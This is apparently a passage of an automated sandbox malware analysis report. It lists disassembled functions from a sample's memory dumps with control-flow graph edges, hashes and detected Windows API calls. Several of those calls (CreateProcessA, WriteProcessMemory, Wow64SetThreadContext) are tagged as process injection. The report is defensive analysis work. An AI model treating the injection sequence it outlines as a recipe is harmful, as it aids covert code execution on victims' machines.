                                                                                                                                                                                                                  control_flow_graph 1832 13cc7e8-13cc7fa 1833 13cc7fc-13cc81d 1832->1833 1834 13cc824-13cc828 1832->1834 1833->1834 1835 13cc82a-13cc82c 1834->1835 1836 13cc834-13cc843 1834->1836 1835->1836 1837 13cc84f-13cc87b 1836->1837 1838 13cc845 1836->1838 1842 13ccaa8-13ccaef 1837->1842 1843 13cc881-13cc887 1837->1843 1838->1837 1874 13ccb05-13ccb11 1842->1874 1875 13ccaf1 1842->1875 1844 13cc88d-13cc893 1843->1844 1845 13cc959-13cc95d 1843->1845 1844->1842 1848 13cc899-13cc8a6 1844->1848 1849 13cc95f-13cc968 1845->1849 1850 13cc980-13cc989 1845->1850 1853 13cc8ac-13cc8b5 1848->1853 1854 13cc938-13cc941 1848->1854 1849->1842 1855 13cc96e-13cc97e 1849->1855 1851 13cc9ae-13cc9b1 1850->1851 1852 13cc98b-13cc9ab 1850->1852 1856 13cc9b4-13cc9ba 1851->1856 1852->1851 1853->1842 1859 13cc8bb-13cc8d3 1853->1859 1854->1842 1858 13cc947-13cc953 1854->1858 1855->1856 1856->1842 1861 13cc9c0-13cc9d3 1856->1861 1858->1844 1858->1845 1862 13cc8df-13cc8f1 1859->1862 1863 13cc8d5 1859->1863 1861->1842 1865 13cc9d9-13cc9e9 1861->1865 1862->1854 1869 13cc8f3-13cc8f9 1862->1869 1863->1862 1865->1842 1868 13cc9ef-13cc9fc 1865->1868 1868->1842 1871 13cca02-13cca17 1868->1871 1872 13cc8fb 1869->1872 1873 13cc905-13cc90b 1869->1873 1871->1842 1883 13cca1d-13cca40 1871->1883 1872->1873 1873->1842 1876 13cc911-13cc935 1873->1876 1879 13ccb1d-13ccb39 1874->1879 1880 13ccb13 1874->1880 1877 13ccaf4-13ccaf6 1875->1877 1881 13ccaf8-13ccb03 1877->1881 1882 13ccb3a-13ccb67 call 13c8200 1877->1882 1880->1879 1881->1874 1881->1877 1894 13ccb7f-13ccb81 1882->1894 1895 13ccb69-13ccb6f 1882->1895 1883->1842 1888 13cca42-13cca4d 1883->1888 1891 13cca9e-13ccaa5 1888->1891 1892 13cca4f-13cca59 1888->1892 1892->1891 1900 13cca5b-13cca71 1892->1900 1918 13ccb83 call 13cddb8 1894->1918 1919 13ccb83 call 13ccc00 1894->1919 1897 13ccb71 1895->1897 1898 13ccb73-13ccb75 1895->1898 1897->1894 1898->1894 1899 13ccb89-13ccb8d 1901 13ccb8f-13ccba6 1899->1901 1902 13ccbd8-13ccbe8 1899->1902 1906 13cca7d-13cca96 1900->1906 1907 13cca73 1900->1907 1901->1902 1910 13ccba8-13ccbb2 1901->1910 1906->1891 1907->1906 1913 13ccbb4-13ccbc3 1910->1913 1914 13ccbc5-13ccbd5 1910->1914 1913->1914 1918->1899 1919->1899
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$d
                                                                                                                                                                                                                  • API String ID: 0-2835645469
                                                                                                                                                                                                                  • Opcode ID: 2095d6b1bfa234eebd1dc977c257a75fda29f704c5de3b3c38e7620b3f3e5d2b
                                                                                                                                                                                                                  • Instruction ID: 82824d75e1814f4a73ade5551cbe7228b5e9c68346f31bf0876b62dbb8c008c8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2095d6b1bfa234eebd1dc977c257a75fda29f704c5de3b3c38e7620b3f3e5d2b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4D169346006068FCB25CF28C48496ABBF2FF89714B19C96DD45A9B762DB30FC46CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CB4E9 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1920 13cb4e9-13cb520 1922 13cb60c-13cb631 1920->1922 1923 13cb526-13cb52a 1920->1923 1930 13cb638-13cb65c 1922->1930 1924 13cb52c-13cb538 1923->1924 1925 13cb53e-13cb542 1923->1925 1924->1925 1924->1930 1926 13cb548-13cb55f 1925->1926 1927 13cb663-13cb688 1925->1927 1938 13cb561-13cb56d 1926->1938 1939 13cb573-13cb577 1926->1939 1948 13cb68f-13cb6e2 1927->1948 1930->1927 1938->1939 1938->1948 1940 13cb579-13cb592 1939->1940 1941 13cb5a3-13cb5bc call 13c8138 1939->1941 1940->1941 1953 13cb594-13cb597 1940->1953 1954 13cb5be-13cb5e2 1941->1954 1955 13cb5e5-13cb609 1941->1955 1963 13cb71a-13cb73f 1948->1963 1964 13cb6e4-13cb704 1948->1964 1958 13cb5a0 1953->1958 1958->1941 1971 13cb746-13cb79a 1963->1971 1964->1971 1972 13cb706-13cb717 1964->1972 1978 13cb7a0-13cb7ac 1971->1978 1979 13cb841-13cb88f 1971->1979 1982 13cb7ae-13cb7b5 1978->1982 1983 13cb7b6-13cb7ca call 13c6940 1978->1983 1992 13cb8bf-13cb8c5 1979->1992 1993 13cb891-13cb8b5 1979->1993 1988 13cb7cc-13cb7f1 1983->1988 1989 13cb839-13cb840 1983->1989 1999 13cb834-13cb837 1988->1999 2000 13cb7f3-13cb80d 1988->2000 1995 13cb8d7-13cb8e6 1992->1995 1996 13cb8c7-13cb8d4 1992->1996 1993->1992 1994 13cb8b7 1993->1994 1994->1992 1999->1988 1999->1989 2000->1999 2002 13cb80f-13cb818 2000->2002 2003 13cb81a-13cb81d 2002->2003 2004 13cb827-13cb833 2002->2004 2003->2004
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$(hq
                                                                                                                                                                                                                  • API String ID: 0-2483692461
                                                                                                                                                                                                                  • Opcode ID: 5a9f0042f04c013344e3dae38b8013725412fd265c47f148f5ae4a95760d2223
                                                                                                                                                                                                                  • Instruction ID: 57743bd0f430143da6fd4c66726e0d27ab8919fba80bdcd64271bc4de5d68fa2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a9f0042f04c013344e3dae38b8013725412fd265c47f148f5ae4a95760d2223
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B55110313042158FDB159F28E890AAE7FE6FF84755F148169E909CB39ACB34DC42CBA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C9070 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2005 13c9070-13c9082 2006 13c9088-13c908a 2005->2006 2007 13c9173-13c9198 2005->2007 2008 13c919f-13c91c3 2006->2008 2009 13c9090-13c909c 2006->2009 2007->2008 2021 13c91ca-13c91ee 2008->2021 2013 13c909e-13c90aa 2009->2013 2014 13c90b0-13c90c0 2009->2014 2013->2014 2013->2021 2014->2021 2022 13c90c6-13c90d4 2014->2022 2026 13c91f5-13c9266 2021->2026 2025 13c90da-13c90e1 call 13c9268 2022->2025 2022->2026 2029 13c90e7-13c912d call 13c8e98 * 3 2025->2029 2046 13c912f-13c9148 2029->2046 2047 13c9150-13c9170 call 13c7000 2029->2047 2046->2047
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$Hhq
                                                                                                                                                                                                                  • API String ID: 0-2633903351
                                                                                                                                                                                                                  • Opcode ID: b31ba822d05b0aa43e466807e24eda33f24930b641d640224fe5ab73feaedb56
                                                                                                                                                                                                                  • Instruction ID: 8f8048097a1721295fcfc0a3ace0ad9085bb12cc561edfc911f5058ed7d2263f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b31ba822d05b0aa43e466807e24eda33f24930b641d640224fe5ab73feaedb56
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3451AC347002119FCB19AF78D86466E77A2EFC9714711886CD60A8B3A5DF35ED07CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 02AD06E8 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2055 2ad06e8-2ad06f3 2056 2ad070b-2ad070d 2055->2056 2057 2ad06f5-2ad06fb 2055->2057 2060 2ad0867-2ad0872 2056->2060 2058 2ad06fd 2057->2058 2059 2ad06ff-2ad0709 2057->2059 2058->2056 2059->2056 2063 2ad0878-2ad087a 2060->2063 2064 2ad0712-2ad0715 2060->2064 2065 2ad087c-2ad088a 2063->2065 2066 2ad0891-2ad0897 2063->2066 2067 2ad0717-2ad0719 2064->2067 2068 2ad0742-2ad0745 2064->2068 2065->2066 2071 2ad0899 2066->2071 2072 2ad089b-2ad08a7 2066->2072 2073 2ad071b-2ad0729 2067->2073 2074 2ad0730-2ad073d 2067->2074 2069 2ad0747-2ad0749 2068->2069 2070 2ad0780-2ad0783 2068->2070 2077 2ad074b-2ad0759 2069->2077 2078 2ad0760-2ad0763 2069->2078 2075 2ad0785-2ad0787 2070->2075 2076 2ad07b0-2ad07b3 2070->2076 2080 2ad08a9-2ad08ae 2071->2080 2072->2080 2073->2074 2074->2060 2081 2ad079e-2ad07ab 2075->2081 2082 2ad0789-2ad0797 2075->2082 2084 2ad07de-2ad07e1 2076->2084 2085 2ad07b5-2ad07b7 2076->2085 2077->2078 2093 2ad076b-2ad076d 2078->2093 2081->2060 2082->2081 2088 2ad07e3-2ad07e5 2084->2088 2089 2ad0812-2ad0815 2084->2089 2091 2ad07ce-2ad07d9 2085->2091 2092 2ad07b9-2ad07c7 2085->2092 2095 2ad07fc 2088->2095 2096 2ad07e7-2ad07f5 2088->2096 2099 2ad0817-2ad0819 2089->2099 2100 2ad0846-2ad0848 2089->2100 2091->2060 2092->2091 2093->2060 2098 2ad0773-2ad077b 2093->2098 2108 2ad0804-2ad0806 2095->2108 2096->2095 2098->2060 2101 2ad081b-2ad0829 2099->2101 2102 2ad0830-2ad083a 2099->2102 2104 2ad085f 2100->2104 2105 2ad084a-2ad0858 2100->2105 2101->2102 2102->2060 2114 2ad083c-2ad0844 2102->2114 2104->2060 2105->2104 2108->2060 2112 2ad0808-2ad0810 2108->2112 2112->2060 2114->2060
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053166177.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2ad0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-2306408947
                                                                                                                                                                                                                  • Opcode ID: 4cb936fbbec48055d528236322e4af6abbe197c34627c2964efd17d1d23bace0
                                                                                                                                                                                                                  • Instruction ID: 113b91dc78b116e8bb4283dbcc97154789dd8a4e952ea981df598c962cd0c929
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb936fbbec48055d528236322e4af6abbe197c34627c2964efd17d1d23bace0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49410F70F406248B8B36672940E523E25E7EFC4B90F59491DC90BDB386EF24CD4697E2
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 02AD0520 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2117 2ad0520-2ad052b 2118 2ad052d-2ad0533 2117->2118 2119 2ad0543-2ad0545 2117->2119 2121 2ad0535 2118->2121 2122 2ad0537-2ad0541 2118->2122 2120 2ad067c-2ad0687 2119->2120 2125 2ad068d-2ad068f 2120->2125 2126 2ad054a-2ad054d 2120->2126 2121->2119 2122->2119 2127 2ad06a7-2ad06ad 2125->2127 2128 2ad0691-2ad069f 2125->2128 2129 2ad054f-2ad0551 2126->2129 2130 2ad05a8-2ad05ab 2126->2130 2135 2ad06af 2127->2135 2136 2ad06b1-2ad06bd 2127->2136 2128->2127 2131 2ad0569-2ad056f 2129->2131 2132 2ad0553-2ad0561 2129->2132 2133 2ad05ad-2ad05af 2130->2133 2134 2ad0603-2ad0606 2130->2134 2173 2ad0574 call 5137090 2131->2173 2174 2ad0574 call 5137358 2131->2174 2132->2131 2138 2ad05c7-2ad05d9 2133->2138 2139 2ad05b1-2ad05bf 2133->2139 2140 2ad0608-2ad060a 2134->2140 2141 2ad065a-2ad065c 2134->2141 2142 2ad06bf-2ad06c4 2135->2142 2136->2142 2158 2ad05db-2ad05e1 2138->2158 2159 2ad05f1-2ad05f3 2138->2159 2139->2138 2144 2ad060c-2ad061a 2140->2144 2145 2ad0622-2ad0634 2140->2145 2146 2ad065e-2ad066c 2141->2146 2147 2ad0674 2141->2147 2144->2145 2163 2ad064c-2ad064e 2145->2163 2164 2ad0636-2ad063c 2145->2164 2146->2147 2147->2120 2149 2ad0579-2ad057b 2152 2ad057d-2ad0583 2149->2152 2153 2ad0593-2ad0595 2149->2153 2160 2ad0585 2152->2160 2161 2ad0587-2ad0589 2152->2161 2153->2120 2154 2ad059b-2ad05a3 2153->2154 2154->2120 2165 2ad05e5-2ad05e7 2158->2165 2166 2ad05e3 2158->2166 2159->2120 2162 2ad05f9-2ad0601 2159->2162 2160->2153 2161->2153 2162->2120 2163->2120 2168 2ad0650-2ad0658 2163->2168 2169 2ad063e 2164->2169 2170 2ad0640-2ad0642 2164->2170 2165->2159 2166->2159 2168->2120 2169->2163 2170->2163 2173->2149 2174->2149
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053166177.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2ad0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-2306408947
                                                                                                                                                                                                                  • Opcode ID: b1dba97405b68001d6e5a70bec2745a9b7671854d5036c06b14a44e2ad2fea14
                                                                                                                                                                                                                  • Instruction ID: 22bdac964c907d6eb8bd634ad2d9177b094b3d119e97584f05e09204ffd4f5fb
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1dba97405b68001d6e5a70bec2745a9b7671854d5036c06b14a44e2ad2fea14
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941C275B002389BCB34672499A577E29D7DBC8B61F11842ADD0BC7785EFA1CC01C7A1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE898C Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-2340669324
                                                                                                                                                                                                                  • Opcode ID: d2f4dccce08047c965fa260be6112cabcd07d004be567dc9d6106ce98a3c15f6
                                                                                                                                                                                                                  • Instruction ID: 3be242f61ef1cfc35ed1d6ddd63520ba1713edcdb8cc6c315396d21ebd084161
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2f4dccce08047c965fa260be6112cabcd07d004be567dc9d6106ce98a3c15f6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F09630B403049FE724AA65DC06BAE7BA6EF84B11F344066E6089B2D1CF71DD01D7A1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CA4E0 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (_dq
                                                                                                                                                                                                                  • API String ID: 0-95542857
                                                                                                                                                                                                                  • Opcode ID: 92c7a5ec80c02cd5081c3230c5bd56eadf8af73ada7b11e38a6a2c49c2372279
                                                                                                                                                                                                                  • Instruction ID: fafad967f23d26b4c10f4f041c25cebb21d35a5341ffeb06228a1481aadceb51
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92c7a5ec80c02cd5081c3230c5bd56eadf8af73ada7b11e38a6a2c49c2372279
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80227E35B002089FDB14DFA8C490AADBBB6FF88714F158459E906EB3A5EB71ED41CB50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B2C4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513B506
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                  • Opcode ID: b985e6e128454bbe4852bf86e4d191650cd8dd7c06954e55912640d408f601b6
                                                                                                                                                                                                                  • Instruction ID: 5d34fd7da278fcc3e518016532da77c707dcfc9079f5c7253e3f42b0a61ed95a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b985e6e128454bbe4852bf86e4d191650cd8dd7c06954e55912640d408f601b6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFA15B71D04619DFDB20DFA9C856BEDBBB2FF48310F148169E809A7280EB749985CF91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B2D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513B506
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                  • Opcode ID: e6f0546836265afb639c7100ad362c9173b97ecc4b104063d737b1b07b98093a
                                                                                                                                                                                                                  • Instruction ID: 7df679d39549323c515913a4bb0b7adb890e2db72eefcfd0502f163fcbd427bb
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6f0546836265afb639c7100ad362c9173b97ecc4b104063d737b1b07b98093a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6915C71D04619DFDB20DFA9C856BEDBBB2FF48310F148169E809A7240EB749985CF91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 05139F6F Relevance: 1.6, APIs: 1, Instructions: 106fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 0513A079
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                  • Opcode ID: a05eb9d800ef8bce35f2cfeb8c236b4b7f57cbf08b54cfc629e22ed19278dcda
                                                                                                                                                                                                                  • Instruction ID: f1baf0ef845b706c355f6ce6892d48d9abddcdbb5b83ee3a15a599293c5473e8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a05eb9d800ef8bce35f2cfeb8c236b4b7f57cbf08b54cfc629e22ed19278dcda
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A84156B1D002599FDB10CFA9C896B9EBFF2FF48300F148129E859AB290D7759846CF91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 05139F78 Relevance: 1.6, APIs: 1, Instructions: 105fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 0513A079
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                  • Opcode ID: 513d4ba01685026b1f7ac10eb79ad3f7d4d1951a64992e56c49b299ea714fdcd
                                                                                                                                                                                                                  • Instruction ID: ef52ac6d8bfdf9c3e26e76e1f24d45a180082a9704d35c170d9f5cf1fb979318
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 513d4ba01685026b1f7ac10eb79ad3f7d4d1951a64992e56c49b299ea714fdcd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E4144B1D002599FDB10DFA9C896B9EBFF1FF48300F108129E859AB290D775A846CF91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B127 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0513B1B8
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                  • Opcode ID: b7521ee45c40a7a33288d90658ddc003001e2de5e1f1287722a396160bacd5be
                                                                                                                                                                                                                  • Instruction ID: 0cb0f0711d36d952398c4a537e0820999c68c8e92f183d87d8219c796c80d9c0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7521ee45c40a7a33288d90658ddc003001e2de5e1f1287722a396160bacd5be
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 902125B19003099FCB10DFAAC885BDEBFF5FF48310F10842AE919A7240D7789945CBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513B128 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0513B1B8
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                  • Opcode ID: cd4f4c449f74fa8b5c712424c2f670ebdfd44749f529b196fa16695b3f6f74da
                                                                                                                                                                                                                  • Instruction ID: 0809a26b719bff9ff421d7061b4a61961c8f8e6d2aa2450a76fefdd4506f5dd7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd4f4c449f74fa8b5c712424c2f670ebdfd44749f529b196fa16695b3f6f74da
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B32125B19003099FCB10DFAAC885BDEBBF5FF48310F50842AE919A7240D778A945CBA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0513AF88 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0513B00E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2062326939.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                  • Opcode ID: 478edac7a19a7253a98cb7fad7a6c72611e4a6cccdf4bb4d0319d2aeadd7064e
                                                                                                                                                                                                                  • Instruction ID: b66226405ed74cdc067f47c87d75bf28bede3280c618a982938fb65e5e2ecbd9
